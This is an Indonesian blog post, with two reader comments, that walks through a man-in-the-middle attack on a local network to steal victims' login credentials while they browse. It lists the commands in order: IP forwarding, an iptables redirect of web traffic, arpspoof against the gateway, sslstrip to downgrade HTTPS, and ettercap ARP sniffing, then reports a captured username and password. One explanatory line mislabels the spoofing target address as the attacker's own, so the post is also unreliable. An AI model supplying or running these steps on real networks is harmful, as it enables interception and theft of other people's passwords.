Rabu, 18 Januari 2017

Mengintip User dan Password Dengan Teknik MITM

Bigboss.web.id - Apakah MITM itu ? Man In The Middle Attack biasa disingkat MITM adalah salah satu metode serangan yang biasa digunakan oleh para hacker yang menyerang dalam sebuah jaringan dengan cara menempatkan diri diantara pengguna lain dan juga jaringan yang digunakan itu sendiri

Pada contoh kali ini saya akan mencoba menyerang korban di sebuah jaringan yang terkoneksi oleh komputer saya dan juga komputer korban yang bertujuan untuk mendapatkan username dan password saat korban browsing

Langkah pertama adalah edit terlebih dahulu file konfigurasi ettercap dengan perintah "leafpad /etc/ettercap/etter.conf"
 Lalu cari "# if you use iptables" dan ubah menjadi seperti ini
Kemudian aktifkan terlebih dahulu IP forward dengan perintah "echo 1 > /proc/sys/net/ipv4/ip_forward"
Setelah itu kita redirect port 80 ke port 10000 agar koneksi korban mengarah keport yang kita inginkan dengan perintah "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"
Lalu kita cek ip gateway dan juga ip kita pada jaringan tersebut dengan perintah "route -n"
Lalu ketikkan perintah "arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1"
Keterangan :
  • wlan 0 : interface yang kita gunakan
  • 192.168.1.100 : ip kita (attacker)
  • 192.168.1.1 : ip gateway (jaringan)

 Selanjutnya kita jalan sslstrip di terminal baru dengan perintah "sslstrip -akf"
Buka terminal lagi untuk menjalankan sniffing dengan perintah "ettercap -T -q -i wlan0 -M arp ///"
Tunggu hingga korban melakukan aktivitas browsing, jika target login ke sebuah web maka akan berhasil seperti ini
Pada gambar diatas saya sukses mengintip salah satu aktivitas browsing korban yaitu korban login ke situs copyscape.com dengan menggunakan username Bigboss.web.id dan passwornya adalah miftah

4 komentar:

  1. Lalu cari "# if you use iptables" dan ubah menjadi seperti ini itu maksudnya apa ya ?

    BalasHapus
    Balasan
    1. ketika membuka file etter.conf cari tulisan "# if you use iptables" setelah itu konfigurasi file seperti pada gambar diatas

      Hapus